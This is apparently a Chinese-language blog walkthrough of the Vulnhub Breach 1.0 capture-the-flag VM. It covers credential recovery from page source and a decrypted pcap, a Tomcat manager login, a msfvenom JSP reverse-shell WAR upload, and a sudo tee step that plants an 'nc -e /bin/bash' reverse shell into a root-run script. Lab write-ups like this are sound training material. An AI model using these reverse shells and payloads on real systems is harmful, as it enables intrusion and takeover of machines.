Vulnhub Breach1.0

1、靶机信息                                                                               

下载链接                                                                                               

https://download.vulnhub.com/breach/Breach-1.0.zip

靶机说明

Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。

VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢

Knightmare和rastamouse进行测试和提供反馈。作者期待大家写出文章,特别是通过非预期的方式获取root权限。

目标

Boot to root:获得root权限,查看flag。

运行环境

靶机:网络连接方式设置为主机模式(host-only),静态IP是192.168.110.140。

攻击机:同网段下有Windows攻击机(物理机),IP地址:192.168.110.20,使用Kali Linux攻击机。

2、信息收集

nmap 扫一波发现都是开放的端口,显然不靠谱,看一下访问一下http,开始渗透吧

3、漏洞挖掘

3.1 获取 CMS的密码:

访问http,查看源码发现两个点:

1、第19行链接到initech.html

2、第23行两次base64进行解密得到:pgibbons:damnitfeel$goodtobeagang$ta

3.2 访问impress cms

使用pgibbons:damnitfeel$goodtobeagang$ta登录http://192.168.110.140/impresscms/user.php

收集信息:

http://192.168.110.140/impresscms/modules/banners/  可浏览目录   Apache版本 2.4.7 服务器 Ubuntu

两个意思的文件:keystore、pcap

keystore

keystore(Inbox-ImpressCMS Admin-192.168.110.140/.keystore Bob)

第1封邮件:
主要内容:让你的团队只能向管理门户发布任何敏感的内容。我的密码非常安全,发自ImpressCMS Admin Bill。
第2封邮件:
主要内容:Michael采购了IDS/IPS。
第3封邮件:
主要内容:有一个peter的SSL证书被保存在192.168.110.140/.keystore。

PS:

keystore是存储公私密码的一种文件格式

pcap

_SSL_test_phase1.pcap(Home-Content-SSL implementation test capture)

me the alias, storepassword and keypassword are all set to 'tomcat'

提示 别名、存储密码和密钥密码都设置为“tomcat”

3.3 得到Tomcat后台

由keystore和pcap等到tomcat后台

获取pcap的时候,提示SSL 证书的 别名、存储密码和密钥密码 都是tomcat

然后keystore又根据邮件提示存储了SSL的证书,所以先从keystore中获取SSL的证书,然后用SSL证书解密pcap得到Tomcat后台

keytool

SSL证书解密pcap

  

tomcat:Tt\5D8F(#!*u=G)4m7zB

登录Tomcat

https://192.168.110.140:8443/_M@nag3Me/html
tomcat:Tt\5D8F(#!*u=G)4m7zB

在此之后我决定查看两个GIF,并且由于使用了密码套件而访问该网站时出现问题,

进入about:config并添加字符串security.tls.insecure_fallback_hosts 192.168.110.140做了诀窍

3.4 Tomcat上传木马

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.23 LPORT=443 -f war > breach.war

然后把breach.war部署到Tomcat上,kali开启监听,访问breach.war反弹回shell

  

4、 提升权限

1、mysql获取milton

MySQL无密码得到milton:thelaststraw

 

 2、从milton获取blumbergh

 3、从blumbergh获取root

5、知识点:

5.1 keystore

是存储公私密码的一种文件格式

5.2 keytool

root@kali:~##查看keystore这个密钥库里面的所有证书

root@kali:~# keytool -list -keystore  ./下载/keystore
root@kali:~##从密钥库导出.p12证书
root@kali:~# keytool -importkeystore -srckeystore ./下载/keystore -destkeystore ./tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat

5.2 查看pcap

ngrep

  ngrep -I _SSL_test_phase1.pcap

  ngrep -i nethunter -I _SSL_test_phase1.pcap

  ngrep -I _SSL_test_phase1.pcap -Wbyline ‘HTTP’

tcpick

 tcpick -C -yP -r _SSL_test_phase1.pcap

tcpdump

 tcpdump -qns 0 -X -r _SSL_test_phase1.pcap

 tshark

 tshark -r _SSL_test_phase1.pcap

 tshark -r _SSL_test_phase1.pcap  | grep -i get

5.3 火狐访问tls

进入about:config并添加字符串security.tls.insecure_fallback_hosts 192.168.110.140

代理 所有协议 访问8080

5.4 生成木马

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.23 LPORT=443 -f war > breach.war

5.5 python搭建简单web

python -m SimpleHTTPServer

5.6 python解决无法su

python -c 'import pty;pty.spawn("/bin/bash")'

5.7 用tee进行提权

echo "nc 192.168.110.20 4445 -e /bin/bash" sudo  /usr/bin/tee    /usr/share/cleanup/tidyup.sh

posted @   竹小冉  阅读(2716)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示